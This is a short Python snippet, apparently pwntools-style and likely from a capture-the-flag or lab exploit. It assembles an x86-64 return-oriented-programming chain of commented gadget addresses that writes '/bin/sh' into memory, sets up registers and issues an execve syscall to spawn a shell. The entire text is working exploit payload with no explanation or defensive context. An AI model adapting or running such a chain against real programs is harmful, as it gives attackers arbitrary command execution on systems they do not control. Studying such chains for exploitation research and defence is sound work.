payload = p64(0x481256)
#0x0000000000481256: pop rcx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x510151)+p64(0x431a43)
# 0x0000000000431a43: pop rax; ret; 
payload += p64(0x4017ce)+p64(0x45bbec)
# 0x000000000045bbec: lea r8, [rbp - 0x64]; lea r9, [rbp - 0x48]; lea rbx, [rbp - 0x40]; push rbx; call rax; 
payload += b''
# 0x00000000004017ce: pop r13; pop r14; pop r15; ret; 
payload += p64(0x0)+p64(0x48b885)
# 0x000000000048b885: add qword ptr [r8 - 0x7d], rcx; ret; 
payload += p64(0x431a43)
# 0x0000000000431a43: pop rax; ret; 
payload += p64(0x2880d0)+p64(0x4343cd)
# 0x00000000004343cd: pop rdx; sub dword ptr [rax + rax], 0xcccc0274; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x510070)+p64(0x437bd9)
# 0x0000000000437bd9: pop rsi; and bh, dh; ret; 
payload += p64(0x0)+p64(0x431a43)
# 0x0000000000431a43: pop rax; ret; 
payload += p64(0x3b)+p64(0x45bc3f)
# 0x000000000045bc3f: syscall; 
payload += b''
